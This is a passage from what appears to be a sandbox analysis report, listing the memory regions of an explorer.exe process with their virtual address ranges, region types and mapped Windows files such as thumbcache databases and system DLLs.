"c:\\programdata\\microsoft\\windows\\caches\\{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db") Region: id = 508 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 509 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 510 start_va = 0x3650000 end_va = 0x3697fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 511 start_va = 0x36a0000 end_va = 0x36a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 512 start_va = 0x36b0000 end_va = 0x36b1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 513 start_va = 0x3720000 end_va = 0x379ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003720000" filename = "" Region: id = 514 start_va = 0x37a0000 end_va = 0x37a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 515 start_va = 0x37b0000 end_va = 0x37b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037b0000" filename = "" Region: id = 516 start_va = 0x37c0000 end_va = 0x37c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037c0000" filename = "" Region: id = 517 start_va = 0x37d0000 end_va = 0x37d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037d0000" filename = "" Region: id = 518 start_va = 0x37e0000 end_va = 0x37e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037e0000" filename = "" Region: id = 519 start_va = 0x37f0000 end_va = 0x37f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000037f0000" filename = "" Region: id = 520 start_va = 0x3800000 end_va = 0x3800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\system32\\en-us\\wdmaud.drv.mui") Region: id = 521 start_va = 0x3810000 end_va = 0x3810fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 522 start_va = 0x3820000 end_va = 0x3821fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 523 start_va = 0x3830000 end_va = 0x38affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003830000" filename = "" Region: id = 524 start_va = 0x38b0000 end_va = 0x38b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038b0000" filename = "" Region: id = 525 start_va = 0x38c0000 end_va = 0x38c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038c0000" filename = "" Region: id = 526 start_va = 0x38f0000 end_va = 0x38f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038f0000" filename = "" Region: id = 527 start_va = 0x3910000 end_va = 0x3911fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003910000" filename = "" Region: id = 528 start_va = 0x3920000 end_va = 0x3921fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003920000" filename = "" Region: id = 529 start_va = 0x3930000 end_va = 0x397ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003930000" filename = "" Region: id = 530 start_va = 0x3980000 end_va = 0x3980fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alttab.dll.mui" filename = "\\Windows\\System32\\en-US\\AltTab.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\alttab.dll.mui") Region: id = 531 start_va = 0x3990000 end_va = 0x3994fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnidui.dll.mui" filename = "\\Windows\\System32\\en-US\\pnidui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnidui.dll.mui") Region: id = 532 start_va = 0x39a0000 end_va = 0x39a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039a0000" filename = "" Region: id = 533 start_va = 0x39b0000 end_va = 0x39b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039b0000" filename = "" Region: id = 534 start_va = 0x39c0000 end_va = 0x3a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039c0000" filename = "" Region: id = 535 start_va = 0x3a40000 end_va = 0x3a40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 536 start_va = 0x3a50000 end_va = 0x3acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 537 start_va = 0x3ad0000 end_va = 0x3ad1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ad0000" filename = "" Region: id = 538 start_va = 0x3ae0000 end_va = 0x3ae6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 539 start_va = 0x3af0000 end_va = 0x3af1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003af0000" filename = "" Region: id = 540 start_va = 0x3b00000 end_va = 0x3b01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b00000" filename = "" Region: id = 541 start_va = 0x3b10000 end_va = 0x3b11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b10000" filename = "" Region: id = 542 start_va = 0x3bb0000 end_va = 0x3bd8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 543 start_va = 0x3cb0000 end_va = 0x3d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 544 start_va = 0x3d50000 end_va = 0x3d50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d50000" filename = "" Region: id = 545 start_va = 0x3d80000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 546 start_va = 0x3e00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 547 start_va = 0x4050000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004050000" filename = "" Region: id = 548 start_va = 0x4110000 end_va = 0x418ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 549 start_va = 0x4190000 end_va = 0x4592fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 550 start_va = 0x45a0000 end_va = 0x461ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 551 start_va = 0x4620000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 552 start_va = 0x46d0000 end_va = 0x474ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 553 start_va = 0x47a0000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 554 start_va = 0x4840000 end_va = 0x48bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004840000" filename = "" Region: id = 555 start_va = 0x48e0000 end_va = 0x495ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048e0000" filename = "" Region: id = 556 start_va = 0x49a0000 end_va = 0x5cf4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 557 start_va = 0x5d80000 end_va = 0x5d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d80000" filename = "" Region: id = 558 start_va = 0x5dd0000 end_va = 0x5e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005dd0000" filename = "" Region: id = 559 start_va = 0x5e60000 end_va = 0x5edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e60000" filename = "" Region: id = 560 start_va = 0x5ef0000 end_va = 0x5f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ef0000" filename = "" Region: id = 561 start_va = 0x5fd0000 end_va = 0x604ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fd0000" filename = "" Region: id = 562 start_va = 0x6050000 end_va = 0x614ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006050000" filename = "" Region: id = 563 start_va = 0x6150000 end_va = 0x624ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 564 start_va = 0x62c0000 end_va = 0x633ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 565 start_va = 0x6340000 end_va = 0x63bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006340000" filename = "" Region: id = 566 start_va = 0x6470000 end_va = 0x647ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006470000" filename = "" Region: id = 567 start_va = 0x64c0000 end_va = 0x64cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064c0000" filename = "" Region: id = 568 start_va = 0x6500000 end_va = 0x657ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 569 start_va = 0x65f0000 end_va = 0x666ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065f0000" filename = "" Region: id = 570 start_va = 0x6670000 end_va = 0x676ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 571 start_va = 0x6810000 end_va = 0x688ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006810000" filename = "" Region: id = 572 start_va = 0x68b0000 end_va = 0x692ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068b0000" filename = "" Region: id = 573 start_va = 0x6980000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006980000" filename = "" Region: id = 574 start_va = 0x6a00000 end_va = 0x6a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 575 start_va = 0x6a90000 end_va = 0x6b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a90000" filename = "" Region: id = 576 start_va = 0x6b20000 end_va = 0x6b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b20000" filename = "" Region: id = 577 start_va = 0x6c00000 end_va = 0x6c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 578 start_va = 0x6c80000 end_va = 0x707ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c80000" filename = "" Region: id = 579 start_va = 0x7080000 end_va = 0x717ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 580 start_va = 0x7180000 end_va = 0x727ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 581 start_va = 0x7280000 end_va = 0x737ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 582 start_va = 0x7380000 end_va = 0x747ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 583 start_va = 0x7480000 end_va = 0x757ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 584 start_va = 0x7580000 end_va = 0x767ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 585 start_va = 0x7680000 end_va = 0x777ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 586 start_va = 0x7780000 end_va = 0x787ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 587 start_va = 0x7880000 end_va = 0x797ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 588 start_va = 0x7980000 end_va = 0x7a7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 589 start_va = 0x7a80000 end_va = 0x7b7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 590 start_va = 0x7b80000 end_va = 0x7c7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 591 start_va = 0x7c80000 end_va = 0x7d7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 592 start_va = 0x7e10000 end_va = 0x7e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e10000" filename = "" Region: id = 593 start_va = 0x7f30000 end_va = 0x7faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f30000" filename = "" Region: id = 594 start_va = 0x8020000 end_va = 0x809ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008020000" filename = "" Region: id = 595 start_va = 0x8780000 end_va = 0x8a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008780000" filename = "" Region: id = 596 start_va = 0x8a80000 end_va = 0x9dd4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 597 start_va = 0x741a0000 end_va = 0x741a5fff monitored = 0 entry_point = 0x741a1010 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 598 start_va = 0x75410000 end_va = 0x754f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 599 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 600 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 601 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 602 start_va = 0x779d0000 end_va = 0x779d6fff monitored = 0 entry_point = 0x779d106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 603 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 604 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 605 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 606 start_va = 0xff120000 end_va = 0xff3dffff monitored = 0 entry_point = 0xff14b790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 607 start_va = 0x7fef0a50000 end_va = 0x7fef0a8afff monitored = 0 entry_point = 0x7fef0a51238 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 608 start_va = 0x7fef0a90000 end_va = 0x7fef0b66fff monitored = 0 entry_point = 0x7fef0a91074 region_type = mapped_file name = "searchfolder.dll" filename = "\\Windows\\System32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll") Region: id = 609 start_va = 0x7fef0de0000 end_va = 0x7fef0ea5fff monitored = 0 entry_point = 0x7fef0def220 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 610 start_va = 0x7fef1120000 end_va = 0x7fef113efff monitored = 0 entry_point = 0x7fef11257b8 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 611 start_va = 0x7fef1e50000 end_va = 0x7fef1ec2fff monitored = 0 entry_point = 0x7fef1eac7f8 region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll") Region: id = 612 start_va = 0x7fef2bd0000 end_va = 0x7fef2d0bfff monitored = 0 entry_point = 0x7fef2bd197c region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 613 start_va = 0x7fef2d10000 end_va = 0x7fef2dacfff monitored = 0 entry_point = 0x7fef2d9d52c region_type = mapped_file name = "fxsapi.dll" filename = "\\Windows\\System32\\FXSAPI.dll" (normalized: "c:\\windows\\system32\\fxsapi.dll") Region: id = 614 start_va = 0x7fef2db0000 end_va = 0x7fef2e86fff monitored = 0 entry_point = 0x7fef2db1254 region_type = mapped_file name = "fxsst.dll" filename = "\\Windows\\System32\\FXSST.dll" (normalized: "c:\\windows\\system32\\fxsst.dll") Region: id = 615 start_va = 0x7fef2e90000 end_va = 0x7fef2ec0fff monitored = 0 entry_point = 0x7fef2e91b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 616 start_va = 0x7fef2ed0000 end_va = 0x7fef2f24fff monitored = 0 entry_point = 0x7fef2ed26e4 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 617 start_va = 0x7fef2f30000 end_va = 0x7fef2faefff monitored = 0 entry_point = 0x7fef2f31070 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 618 start_va = 0x7fef2fb0000 end_va = 0x7fef3071fff monitored = 0 entry_point = 0x7fef2fd04b4 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 619 start_va = 0x7fef3080000 end_va = 0x7fef32aafff monitored = 0 entry_point = 0x7fef3081f00 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 620 start_va = 0x7fef32b0000 end_va = 0x7fef3303fff monitored = 0 entry_point = 0x7fef32b104c region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 621 start_va = 0x7fef3310000 end_va = 0x7fef3ec6fff monitored = 0 entry_point = 0x7fef3311bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 622 start_va = 0x7fef3ed0000 end_va = 0x7fef3f84fff monitored = 0 entry_point = 0x7fef3ef1cd0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 623 start_va = 0x7fef3f90000 end_va = 0x7fef3fe7fff monitored = 0 entry_point = 0x7fef3f930f0 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 624 start_va = 0x7fef3ff0000 end_va = 0x7fef4034fff monitored = 0 entry_point = 0x7fef3ff4190 region_type = mapped_file name = "qagent.dll" filename = "\\Windows\\System32\\QAGENT.DLL" (normalized: "c:\\windows\\system32\\qagent.dll") Region: id = 625 start_va = 0x7fef4040000 end_va = 0x7fef404cfff monitored = 0 entry_point = 0x7fef4047104 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 626 start_va = 0x7fef4050000 end_va = 0x7fef40adfff monitored = 0 entry_point = 0x7fef408a7fc region_type = mapped_file name = "wwanapi.dll" filename = "\\Windows\\System32\\WWanAPI.dll" (normalized: "c:\\windows\\system32\\wwanapi.dll") Region: id = 627 start_va = 0x7fef40b0000 end_va = 0x7fef40b6fff monitored = 0 entry_point = 0x7fef40b1b24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" (normalized: "c:\\windows\\system32\\wlanutil.dll") Region: id = 628 start_va = 0x7fef40c0000 end_va = 0x7fef40dffff monitored = 0 entry_point = 0x7fef40c1010 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 629 start_va = 0x7fef40e0000 end_va = 0x7fef411efff monitored = 0 entry_point = 0x7fef40e12c0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 630 start_va = 0x7fef4330000 end_va = 0x7fef434efff monitored = 0 entry_point = 0x7fef4333580 region_type = mapped_file name = "qutil.dll" filename = "\\Windows\\System32\\QUTIL.DLL" (normalized: "c:\\windows\\system32\\qutil.dll") Region: id = 631 start_va = 0x7fef4350000 end_va = 0x7fef450cfff monitored = 0 entry_point = 0x7fef4351010 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 632 start_va = 0x7fef4510000 end_va = 0x7fef4548fff monitored = 0 entry_point = 0x7fef4511240 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 633 start_va = 0x7fef4550000 end_va = 0x7fef456ffff monitored = 0 entry_point = 0x7fef4551298 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 634 start_va = 0x7fef4570000 end_va = 0x7fef457ffff monitored = 0 entry_point = 0x7fef45795dc region_type = mapped_file name = "alttab.dll" filename = "\\Windows\\System32\\AltTab.dll" (normalized: "c:\\windows\\system32\\alttab.dll") Region: id = 635 start_va = 0x7fef4580000 end_va = 0x7fef480afff monitored = 0 entry_point = 0x7fef4586f5c region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 636 start_va = 0x7fef4810000 end_va = 0x7fef4883fff monitored = 0 entry_point = 0x7fef48454c8 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 637 start_va = 0x7fef4890000 end_va = 0x7fef4900fff monitored = 0 entry_point = 0x7fef48cecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 638 start_va = 0x7fef4910000 end_va = 0x7fef4978fff monitored = 0 entry_point = 0x7fef4911198 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 639 start_va = 0x7fef4a50000 end_va = 0x7fef4a70fff monitored = 0 entry_point = 0x7fef4a573a0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 640 start_va = 0x7fef4af0000 end_va = 0x7fef4bacfff monitored = 0 entry_point = 0x7fef4af1ea4 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 641 start_va = 0x7fef4bf0000 end_va = 0x7fef4bfbfff monitored = 0 entry_point = 0x7fef4bf602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 642 start_va = 0x7fef6a50000 end_va = 